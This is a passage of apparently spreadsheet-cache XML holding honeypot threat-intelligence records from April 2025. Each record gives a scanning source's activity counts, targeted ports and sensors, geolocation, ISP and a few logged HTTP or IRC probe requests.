    <x v="1748"/>
    <x v="1748"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T23:37:55"/>
    <d v="2025-04-14T23:37:55"/>
    <d v="2025-04-14T23:37:55"/>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f:f9c0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1749"/>
    <x v="1749"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T23:30:03"/>
    <d v="2025-04-14T23:26:32"/>
    <d v="2025-04-14T23:30:03"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RS"/>
    <s v="Rio Grande do Sul"/>
    <s v="Espumoso"/>
    <s v="Espumoso"/>
    <s v="3463916"/>
    <s v="NA"/>
    <s v="-28.7247"/>
    <s v="-52.8497"/>
    <s v="28343"/>
    <s v="UNIFIQUE TELECOMUNICACOES S/A"/>
    <s v="Proserver Telecomunicacoes S.A."/>
    <s v="hosting"/>
    <s v="Proserver Telecomunicacoes S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bac0:d81b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1750"/>
    <x v="1750"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T23:24:20"/>
    <d v="2025-04-14T23:24:20"/>
    <d v="2025-04-14T23:24:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d2:b6e3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1751"/>
    <x v="1751"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T23:23:42"/>
    <d v="2025-04-14T23:23:42"/>
    <d v="2025-04-14T23:23:42"/>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d8:9db9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1752"/>
    <x v="1752"/>
    <s v="NA&amp;&amp;r167-61-153-181.dialup.adsl.anteldata.net.uy"/>
    <x v="0"/>
    <d v="2025-04-14T22:58:15"/>
    <d v="2025-04-14T21:42:58"/>
    <d v="2025-04-14T22:58:15"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="UY"/>
    <s v="Uruguay"/>
    <s v="MO"/>
    <s v="Montevideo Department"/>
    <s v="Municipio B"/>
    <s v="Montevideo"/>
    <s v="3441575"/>
    <s v="NA"/>
    <s v="-34.9033"/>
    <s v="-56.1882"/>
    <s v="6057"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="business"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a73d:99b5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1753"/>
    <x v="1753"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:57:21"/>
    <d v="2025-04-10T12:10:03"/>
    <d v="2025-04-14T22:57:21"/>
    <n v="10"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;abuseipdb"/>
    <s v="3306&amp;&amp;NA&amp;&amp;6667"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="Microsoft Corporation"/>
    <s v="business"/>
    <s v="Microsoft Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;command"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;NA&amp;&amp;{Data_IRC:{'command': 'MGLNDD_154.26.156.60_6667', 'params': '[]', 'prefix': ''}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:30d9:57c9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1754"/>
    <x v="1754"/>
    <s v="114-35-19-181.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:29:55"/>
    <d v="2023-07-29T07:59:13"/>
    <d v="2025-04-14T22:29:55"/>
    <n v="1606"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_HTTP_H31&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_IPP_H29&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;445&amp;&amp;80&amp;&amp;22&amp;&amp;9100&amp;&amp;631&amp;&amp;389&amp;&amp;5900&amp;&amp;1080&amp;&amp;443&amp;&amp;28427&amp;&amp;23&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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:13b5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1755"/>
    <x v="1755"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:14:38"/>
    <d v="2024-12-23T08:36:54"/>
    <d v="2025-04-14T22:14:38"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="MD"/>
    <s v="Moldova"/>
    <s v="DR"/>
    <s v="Drochia"/>
    <s v="NA"/>
    <s v="Drochia"/>
    <s v="618370"/>
    <s v="MD-5216"/>
    <s v="48.0318"/>
    <s v="27.8183"/>
    <s v="62013"/>
    <s v="Societatea Comerciala Click-COM SRL"/>
    <s v="Societatea Comerciala Click-COM SRL"/>
    <s v="business"/>
    <s v="Societatea Comerciala Click-COM SRL"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b5:296f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1756"/>
    <x v="1756"/>
    <s v="NA&amp;&amp;60-198-66-207.dynamic.tfn.net.tw"/>
    <x v="0"/>
    <d v="2025-04-14T22:10:59"/>
    <d v="2025-01-06T17:43:44"/>
    <d v="2025-04-14T22:10:59"/>
    <n v="251"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23&amp;&amp;35906&amp;&amp;35917&amp;&amp;39657&amp;&amp;11847&amp;&amp;34725&amp;&amp;34761&amp;&amp;34780&amp;&amp;34790&amp;&amp;34811&amp;&amp;NA&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="9924"/>
    <s v="Taiwan Fixed Network, Telco and Network Service Provider."/>
    <s v="Taiwan Fixed Network"/>
    <s v="business"/>
    <s v="Taiwan Fixed Network CO., LTD."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3cc6:42cf"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1757"/>
    <x v="1757"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:10:37"/>
    <d v="2025-03-31T02:45:11"/>
    <d v="2025-04-14T22:10:37"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="NA"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0082"/>
    <s v="28.9784"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4ebc:6d8f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1758"/>
    <x v="1758"/>
    <s v="114-33-78-11.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:10:26"/>
    <d v="2023-11-24T09:50:11"/>
    <d v="2025-04-14T22:10:26"/>
    <n v="506"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;15774&amp;&amp;23&amp;&amp;9100&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:4e0b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1759"/>
    <x v="1759"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:10:24"/>
    <d v="2025-04-04T02:17:29"/>
    <d v="2025-04-14T22:10:24"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RN"/>
    <s v="Rio Grande do Norte"/>
    <s v="Nova Cruz"/>
    <s v="Nova Cruz"/>
    <s v="3393876"/>
    <s v="NA"/>
    <s v="-6.47806"/>
    <s v="-35.4339"/>
    <s v="52562"/>
    <s v="INTELNET SERVICO DE MULTIMIDIA LTDA"/>
    <s v="Intelnet Servico De Multimidia Ltda"/>
    <s v="business"/>
    <s v="Intelnet Servico De Multimidia Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b1df:5fe4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1760"/>
    <x v="1760"/>
    <s v="125-229-114-24.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:10:23"/>
    <d v="2023-11-25T02:39:08"/>
    <d v="2025-04-14T22:10:23"/>
    <n v="1097"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_NTP_H27&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;123&amp;&amp;389&amp;&amp;47815&amp;&amp;52650&amp;&amp;52654&amp;&amp;23&amp;&amp;9100&amp;&amp;NA&amp;&amp;80&amp;&amp;55149&amp;&amp;51301&amp;&amp;51288&amp;&amp;51344&amp;&amp;51360&amp;&amp;51378&amp;&amp;51398"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:7218"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1761"/>
    <x v="1761"/>
    <s v="220-134-244-39.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:10:16"/>
    <d v="2023-07-26T10:25:31"/>
    <d v="2025-04-14T22:10:16"/>
    <n v="3952"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_IPP_H39&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_HTTP_H33&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_HTTPS_H42&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;631&amp;&amp;22&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;5900&amp;&amp;50818&amp;&amp;23&amp;&amp;22618&amp;&amp;40800&amp;&amp;52203&amp;&amp;52224&amp;&amp;9100&amp;&amp;35261&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
